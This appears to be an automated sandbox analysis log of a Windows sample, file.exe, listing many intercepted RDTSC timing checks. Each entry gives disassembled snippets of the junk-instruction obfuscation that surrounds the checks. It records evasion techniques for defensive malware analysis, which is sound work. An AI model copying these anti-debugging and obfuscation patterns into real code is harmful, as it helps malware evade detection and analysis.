Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1C73 second address: 4F1CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5E60BA1667h 0x0000000a jmp 00007F5E60BA165Fh 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F9A43 second address: 4F9A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7C99 second address: 4F7CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F7CAC second address: 4F7CB9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F80A2 second address: 4F80A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F80A6 second address: 4F80AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F8217 second address: 4F821B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F838B second address: 4F838F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F84E0 second address: 4F84ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F84ED second address: 4F84F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F8658 second address: 4F865E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F865E second address: 4F8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F8664 second address: 4F8668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F8668 second address: 4F86A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E60CAC686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F5E60CAC692h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 pushad 0x00000016 jnc 00007F5E60CAC686h 0x0000001c push esi 0x0000001d pop esi 0x0000001e jno 00007F5E60CAC686h 0x00000024 js 00007F5E60CAC686h 0x0000002a popad 0x0000002b js 00007F5E60CAC692h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F87DA second address: 4F87E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F87E3 second address: 4F87E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F87E9 second address: 4F87EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5034C2 second address: 5034D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E60CAC68Ah 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5E60CAC686h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5034D8 second address: 5034DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 504E26 second address: 504E53 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E60CAC68Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5E60CAC696h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 504E53 second address: 504E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 504E57 second address: 504E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 512B79 second address: 512B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F5E60BA1661h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5189CD second address: 5189D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5189D7 second address: 5189DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 518B3C second address: 518B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F5E60CAC68Bh 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 518B53 second address: 518B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jl 00007F5E60BA1656h 0x0000000f pop esi 0x00000010 jbe 00007F5E60BA165Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 518B6D second address: 518B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F5E60CAC686h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 518B79 second address: 518B8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60BA1656h 0x00000008 jl 00007F5E60BA1656h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 525115 second address: 525119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CD6C second address: 52CD8B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E60BA1656h 0x00000008 jnc 00007F5E60BA1656h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F5E60BA165Dh 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B81C second address: 52B82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007F5E60CAC686h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B82D second address: 52B833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B833 second address: 52B837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C007 second address: 52C00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C00B second address: 52C011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C011 second address: 52C029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E60BA165Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532B6A second address: 532B74 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60CAC692h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5326A8 second address: 5326FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 jl 00007F5E60BA1656h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F5E60BA165Ch 0x00000015 popad 0x00000016 push edx 0x00000017 jmp 00007F5E60BA165Ch 0x0000001c push ecx 0x0000001d jmp 00007F5E60BA1663h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535C91 second address: 535C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535C97 second address: 535C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535C9E second address: 535CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC694h 0x00000009 js 00007F5E60CAC686h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007F5E60CAC695h 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535CD7 second address: 535CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535CDD second address: 535CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC696h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546660 second address: 54667C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1668h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5405E4 second address: 5405ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5405ED second address: 5405F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5405F1 second address: 540605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F5E60CAC686h 0x0000000e jo 00007F5E60CAC686h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DDD1 second address: 56DDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DDD7 second address: 56DDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F5E60CAC686h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DDE3 second address: 56DDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DDFA second address: 56DE07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007F5E60CAC686h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56CF4F second address: 56CF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56CF53 second address: 56CF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D0AF second address: 56D0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D0B5 second address: 56D0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007F5E60CAC68Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jnc 00007F5E60CAC686h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D24E second address: 56D252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D252 second address: 56D256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D6B8 second address: 56D6BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D6BC second address: 56D6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E60CAC691h 0x0000000b jl 00007F5E60CAC68Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D6DB second address: 56D6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D6E3 second address: 56D6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC690h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D6F7 second address: 56D709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56F492 second address: 56F496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56F496 second address: 56F49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571D26 second address: 571D4E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E60CAC69Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 571D4E second address: 571D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572012 second address: 572016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572016 second address: 57201C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57201C second address: 572020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5720E1 second address: 5720F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E60BA1658h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F5E60BA1664h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5720F8 second address: 5721A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F5E60CAC688h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D216Ah], edx 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F5E60CAC688h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov dx, 09AEh 0x0000004b movzx edx, si 0x0000004e call 00007F5E60CAC689h 0x00000053 push eax 0x00000054 jnp 00007F5E60CAC68Ch 0x0000005a jg 00007F5E60CAC686h 0x00000060 pop eax 0x00000061 push eax 0x00000062 jp 00007F5E60CAC69Ah 0x00000068 mov eax, dword ptr [esp+04h] 0x0000006c pushad 0x0000006d jmp 00007F5E60CAC696h 0x00000072 pushad 0x00000073 jne 00007F5E60CAC686h 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5721A6 second address: 5721BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a jg 00007F5E60BA1656h 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 572452 second address: 5724A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d jng 00007F5E60CAC6A4h 0x00000013 call 00007F5E60CAC697h 0x00000018 mov edx, dword ptr [ebp+122D38B3h] 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D3514h] 0x00000025 jo 00007F5E60CAC68Ch 0x0000002b mov edx, dword ptr [ebp+122D2039h] 0x00000031 push CFD41F00h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push edi 0x0000003a pop edi 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5724A4 second address: 5724C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 573CD2 second address: 573CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5E60CAC686h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57383A second address: 573851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA1663h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 573851 second address: 573869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575696 second address: 57569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70E6B second address: 4A70E88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70E88 second address: 4A70E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA165Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70E98 second address: 4A70E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70E9C second address: 4A70EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F5E60BA165Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70EB7 second address: 4A70F18 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E60CAC68Ah 0x00000008 xor si, 8A98h 0x0000000d jmp 00007F5E60CAC68Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, ebx 0x0000001d pushfd 0x0000001e jmp 00007F5E60CAC697h 0x00000023 sbb ecx, 5297E00Eh 0x00000029 jmp 00007F5E60CAC699h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70F18 second address: 4A70F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60DB4 second address: 4A60DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60DBA second address: 4A60DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA09D8 second address: 4AA0A2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60CAC697h 0x00000009 and cx, 9E9Eh 0x0000000e jmp 00007F5E60CAC699h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 jmp 00007F5E60CAC68Ah 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ah, bh 0x00000025 mov cx, B2E5h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A400E3 second address: 4A40161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov bl, al 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F5E60BA1668h 0x0000000f jmp 00007F5E60BA1662h 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007F5E60BA1661h 0x0000001e mov ebp, esp 0x00000020 jmp 00007F5E60BA165Eh 0x00000025 push dword ptr [ebp+04h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F5E60BA165Dh 0x00000030 jmp 00007F5E60BA1660h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40161 second address: 4A401A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov al, 24h 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 push dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov esi, 2A186A8Bh 0x0000001e pushfd 0x0000001f jmp 00007F5E60CAC690h 0x00000024 or si, FA98h 0x00000029 jmp 00007F5E60CAC68Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60B39 second address: 4A60BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E60BA1661h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 mov bx, si 0x00000017 popad 0x00000018 mov ax, 12F1h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5E60BA1669h 0x00000026 or cx, 5036h 0x0000002b jmp 00007F5E60BA1661h 0x00000030 popfd 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F5E60BA165Dh 0x0000003a rdtsc
